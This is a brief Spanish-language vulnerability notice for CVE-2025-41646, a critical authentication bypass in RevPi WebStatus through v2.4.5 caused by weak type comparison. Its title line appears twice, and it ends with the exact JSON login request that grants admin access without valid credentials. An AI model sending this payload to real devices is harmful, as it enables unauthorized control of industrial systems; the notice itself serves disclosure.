
CVE-2025-41646 - Bypass de autenticación crítico
CVE-2025-41646 - Bypass crítico de autenticación
Una vulnerabilidad crítica de bypass de autenticación (CVE-2025-41646) en RevPi WebStatus ≤ v2.4.5 permite a un atacante iniciar sesión como admin sin credenciales válidas debido a una lógica de comparación de tipos débil (== vs ===).
Enviar una solicitud de inicio de sesión con:
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}